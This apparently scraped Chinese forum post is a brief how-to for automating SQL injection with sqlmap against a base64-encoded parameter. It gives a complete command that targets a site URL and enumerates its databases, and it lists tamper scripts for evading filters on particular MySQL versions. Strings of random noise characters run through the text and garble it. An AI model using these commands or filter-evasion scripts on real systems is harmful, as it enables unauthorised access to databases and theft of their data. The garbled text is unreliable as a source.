WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?7 I* S! E, {8 x( k% p/ I
9 x; e# Q7 N9 {$ Qsqlmap的tamper里有个base64encode.py
1 C0 ?' K, p2 M$ m) T# S1 Q1 S( \
6 Z% D3 n; b# V, W使用如下* x1 h) I& l$ y8 l4 |4 f8 g
* U" e' Z. q: \' c+ S/ Z
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs, t, b* [$ N f j% T0 h& X2 O
6 E( @" v7 X2 R: H: b% ^' P
; h* T( A4 d. z9 ^9 z( Qsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
2 r T. j6 _! _& P* n4 x6 B+ \: j$ n0 f
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:1 p9 S/ `$ [# l. B* w$ V1 K3 {8 E
3 R. p8 _! y! C% _3 t% Lspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入" P l* n2 L1 ~( N3 P, y* |1 e
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入+ E7 f1 O: T; Y. {
首先确定目标数据库版本,然后选择相应的脚本。' t8 e3 G( F, t# M3 y
-v 3 --batch --tamper "space2hash.py"$ k" \8 c v5 p9 _' g
9 d6 E. ]8 z/ w2 T; V' B$ U, H7 X
还有其他一些插件:" G' p! l' @0 u$ M' A4 J, A
encodes编码 ——charencode.py1 I( e$ C! z h A" T( W: L' {! ]8 r
base64编码 —— base64encode.py
( N* o- ~! c+ r# w$ K; t替换空格和关键字 —— halfversionedmorekeywords.py" n, a3 b1 }3 T+ q- C: l C9 @
| & Z0 o1 {" X3 W6 S' J9 `6 P. K. R1 j7 h
4 |- \4 g8 Q3 a q8 y
! u4 B) \ y9 e( ^: Z, s( G% u
5 c: b/ i& `! L- @* @$ _ |